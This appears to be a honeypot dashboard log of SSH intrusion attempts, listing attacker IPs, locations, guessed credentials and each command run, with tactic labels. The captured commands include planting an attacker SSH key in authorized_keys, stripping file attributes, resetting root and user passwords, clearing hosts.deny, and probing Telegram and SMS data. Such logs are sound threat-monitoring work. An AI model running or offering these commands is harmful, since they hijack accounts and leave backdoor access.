$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l ร—2
โ†ณ CPU profiling
$ echo "root:aW24Xm8SO57Q"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' ร—2
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' ร—2
$ ls -lh $(which ls) ร—2
$ which ls ร—2
$ crontab -l ร—2
โ†ณ persistence setup
$ w ร—2
โ†ณ logged-in users check
$ uname -m ร—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l ร—2
โ†ณ CPU profiling
$ top ร—2
โ†ณ process monitoring
$ uname ร—2
โ†ณ OS identification
$ uname -a ร—2
โ†ณ OS/kernel identification
$ whoami ร—2
โ†ณ privilege check
$ lscpu | grep Model ร—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' ร—2
$ echo -e "deploy\n1CFgAWKTru3L\n1CFgAWKTru3L"|passwd|bash
$ Enter new UNIX password:
$ echo "deploy\n1CFgAWKTru3L\n1CFgAWKTru3L\n"|passwd
๐ŸŽญ drowsy_dimsum_root (152.32.129.236) โ€” Hong Kong, Hong Kong ยท 1 session ยท 2 cmds
2026-06-17 09:59 EDT ยท as oracle/changeme
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ midnight_tea_root (209.97.183.43) โ€” Slough, United Kingdom ยท 25 sessions ยท 25 cmds
2026-06-15 12:09 EDT ยท as deploy/deploy, mysql/mysql, oracle/0r4cl3
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—25
๐ŸŽญ molten_durian_root_73 (101.47.27.73) โ€” Singapore, Singapore ยท 1 session ยท 2 cmds
2026-06-17 09:19 EDT ยท as oracle/changeme
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ listless_bibimbap_root (1.238.106.229) โ€” Suwon, South Korea ยท 1 session ยท 2 cmds
2026-06-17 08:55 EDT ยท as oracle/changeme
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ venomous_orchid_pi (47.84.105.173) โ€” Singapore, Singapore ยท 1 session ยท 1 cmd
2026-06-17 08:27 EDT ยท as pi/pi
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ cryptic_jade_root (103.44.237.71) โ€” Guangzhou, China ยท 1 session ยท 20 cmds
2026-06-17 07:59 EDT ยท as deploy/deploy123
cd ~; chattr -ia .ssh โ†’ rm -rf .ssh โ†’ mkdir .ssh โ†’ echo "ssh-rsa" โ†’ cat /proc/cpuinfo | grep name | wc -l โ†’ echo -e "deploy123\neGgfGzzQCyVk\neGgfGzzQCyVk"|passwd|bash โ†’ Enter new UNIX password: โ†’ echo "deploy
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "deploy123\neGgfGzzQCyVk\neGgfGzzQCyVk"|passwd|bash
$ Enter new UNIX password:
$ echo "deploy123\neGgfGzzQCyVk\neGgfGzzQCyVk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ clandestine_orchid_root_33 (8.222.210.33) โ€” Singapore, Singapore ยท 1 session ยท 1 cmd
2026-06-17 07:45 EDT ยท as ubuntu/ubuntu
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ midnight_eagle_root_67 (47.77.180.67) โ€” Minkler, United States ยท 1 session ยท 1 cmd
2026-06-17 07:26 EDT ยท as admin/admin
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ hollow_tiger_db (4.240.8.92) โ€” Pune, India ยท 2 sessions ยท 2 cmds
2026-05-16 09:06 EDT ยท as oracle/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a ร—2
โ†ณ OS/kernel identification
๐ŸŽญ listless_jade_root (121.196.156.122) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-06-17 03:57 EDT ยท as ubuntu/ubuntu
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ derelict_panda_root (183.224.219.194) โ€” Guangzhou, China ยท 1 session ยท 1 cmd
2026-06-17 01:04 EDT ยท as postgres/postgres
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ venomous_yankee_root_114 (47.251.12.114) โ€” Santa Clara, United States ยท 1 session ยท 1 cmd
2026-06-17 00:56 EDT ยท as mysql/mysql
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ nocturnal_dragon_root_222 (39.105.12.222) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-06-17 00:46 EDT ยท as root/12345678
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ jittery_wok_root_43 (14.29.248.43) โ€” Shenzhen, China ยท 1 session ยท 1 cmd
2026-06-16 21:26 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ velvet_cactus_root (186.96.158.180) โ€” Mexico City, Mexico ยท 1 session ยท 20 cmds
2026-06-16 20:05 EDT ยท as postgres/postgres
cd ~; chattr -ia .ssh; lockr -ia .ssh โ†’ cd ~ && rm -rf .ssh && mkdir .ssh โ†’ echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7Vv" โ†’ cat /proc/cpuinfo | grep name | wc
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "postgres\n5BcmFD3jm6pa\n5BcmFD3jm6pa"|passwd|bash
$ Enter new UNIX password:
$ echo "postgres\n5BcmFD3jm6pa\n5BcmFD3jm6pa\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ brazen_strudel_root (164.92.140.160) โ€” Frankfurt am Main, Germany ยท 1 session ยท 20 cmds
2026-06-16 20:01 EDT ยท as postgres/postgres
cd ~; chattr -ia .ssh; lockr -ia .ssh โ†’ cd ~ && rm -rf .ssh && mkdir .ssh โ†’ echo "ssh-rsa" payload injection โ†’ cat /proc/cpuinfo | grep name | wc -l โ†’ echo "postgres\nANA96l2iv8HD"|passwd|bash โ†’ Enter new UNIX password: prompt โ†’ echo "postgres\n
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "postgres\nANA96l2iv8HD\nANA96l2iv8HD"|passwd|bash
$ Enter new UNIX password:
$ echo "postgres\nANA96l2iv8HD\nANA96l2iv8HD\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ crimson_spice_root (205.254.166.83) โ€” Bengaluru, India ยท 1 session ยท 20 cmds
2026-06-16 19:10 EDT ยท as oracle/Password
cd ~; chattr -ia .ssh โ†’ rm -rf .ssh โ†’ mkdir .ssh โ†’ echo "ssh-rsa..." โ†’ cat /proc/cpuinfo | grep name | wc -l โ†’ echo "Password\naywXMs7ubggu\naywXMs7ubggu"|passwd|bash โ†’ Enter new UNIX password: โ†’ echo "Password\naywXMs
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "Password\naywXMs7ubggu\naywXMs7ubggu"|passwd|bash
$ Enter new UNIX password:
$ echo "Password\naywXMs7ubggu\naywXMs7ubggu\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ sneaky_junk_root (40.81.31.179) โ€” Hong Kong, Hong Kong ยท 1 session ยท 1 cmd
2026-06-16 18:52 EDT ยท as root/1234
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ velvet_dragon_root (221.207.55.165) โ€” Xining, China ยท 1 session ยท 1 cmd
2026-06-16 18:43 EDT ยท as root/12345678
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ brazen_monsoon_root (20.219.193.93) โ€” Pune, India ยท 1 session ยท 1 cmd
2026-06-16 18:17 EDT ยท as ubuntu/ubuntu
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ manic_toque_root (57.134.215.133) โ€” Chatham, Canada ยท 1 session ยท 20 cmds
2026-06-16 14:47 EDT ยท as user/password
user/password auth โ†’ chattr/lockr disable .ssh โ†’ rm -rf .ssh โ†’ mkdir .ssh โ†’ echo RSA key โ†’ passwd brute-force (password/BwkWZceWBW87) โ†’ cat /proc/cpuinfo | grep name | wc -l (CPU core count) โ†’ cat /proc/cpuinfo | grep model | head -n 1 | awk (CPU model
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "password\nBwkWZceWBW87\nBwkWZceWBW87"|passwd|bash
$ Enter new UNIX password:
$ echo "password\nBwkWZceWBW87\nBwkWZceWBW87\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ weary_bistro_root (158.220.125.127) โ€” Lauterbourg, France ยท 1 session ยท 20 cmds
2026-06-16 14:40 EDT ยท as user/password
cd ~ && rm -rf .ssh && mkdir .ssh โ†’ chattr -ia .ssh โ†’ passwd brute-force loop with hardcoded credentials โ†’ cat /proc/cpuinfo | grep model/name โ†’ free -m | grep Mem โ†’ uname -m โ†’ top โ†’ crontab -l โ†’ w
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "password\nOSBI86y6TnIO\nOSBI86y6TnIO"|passwd|bash
$ Enter new UNIX password:
$ echo "password\nOSBI86y6TnIO\nOSBI86y6TnIO\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ cryptic_nomad_root (91.92.40.171) โ€” Varna, Bulgaria ยท 31 sessions ยท 31 cmds
2026-06-16 09:38 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—31
๐ŸŽญ manic_lantern_root (117.50.130.149) โ€” Beijing, China ยท 10 sessions ยท 10 cmds
2026-06-16 00:33 EDT ยท as admin/123456, oracle/123456, oracle/oracle
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—10
๐ŸŽญ frantic_jade (39.105.85.43) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-06-16 07:33 EDT ยท as test/test
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ feral_meatball_root (16.171.114.17) โ€” Stockholm, Sweden ยท 32 sessions ยท 32 cmds
2026-06-16 04:47 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—32
๐ŸŽญ savage_seoul_root (112.167.99.220) โ€” Jeongseon-gun, South Korea ยท 1 session ยท 9 cmds
2026-06-16 05:28 EDT ยท as root/root
root/root login โ†’ /ip cloud print โ†’ ifconfig โ†’ uname -a โ†’ cat /proc/cpuinfo โ†’ ps | grep '[Mm]iner' โ†’ ps -ef | grep '[Mm]iner' โ†’ locate D877F783D5D3EF8Cs โ†’ echo Hi | cat -n
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ manic_chai_sol (103.64.129.98) โ€” Bengaluru, India ยท 1 session ยท 1 cmd
2026-06-16 03:34 EDT ยท as root/pass123
echo
$ echo -e "\x6F\x6B"
๐ŸŽญ zealous_cipher_root (91.92.40.36) โ€” Varna, Bulgaria ยท 27 sessions ยท 27 cmds
2026-06-16 01:27 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—27
๐ŸŽญ lurking_dragon_root_123 (124.221.11.123) โ€” Shanghai, China ยท 1 session ยท 1 cmd
2026-06-15 21:33 EDT ยท as root/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ zealous_lantern_root_233 (47.114.107.233) โ€” Hangzhou, China ยท 1 session ยท 1 cmd
2026-06-15 19:56 EDT ยท as deploy/deploy123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ ironclad_gaucho_root (186.123.101.50) โ€” Avellaneda, Argentina ยท 1 session ยท 20 cmds
2026-06-15 18:26 EDT ยท as oracle/welcome123
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "welcome123\n0t4WX4QUFokv\n0t4WX4QUFokv"|passwd|bash
$ Enter new UNIX password:
$ echo "welcome123\n0t4WX4QUFokv\n0t4WX4QUFokv\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ velvet_liberty_root (76.127.61.251) โ€” Santa Fe, United States ยท 1 session ยท 2 cmds
2026-06-15 17:22 EDT ยท as oracle/welcome123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
